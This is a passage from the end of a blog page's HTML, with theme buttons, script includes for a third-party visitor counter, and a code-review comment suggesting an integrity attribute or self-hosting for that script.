id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script async data-pjax 
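src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<!-- NOTE(review): the visitor-counter script above is third-party code that runs with full access to this page and is loaded without an integrity attribute. The URL now uses explicit https: instead of a protocol-relative scheme; consider self-hosting a reviewed copy, or adding integrity + crossorigin once the hash of the reviewed file has been computed. -->
</div></body></html>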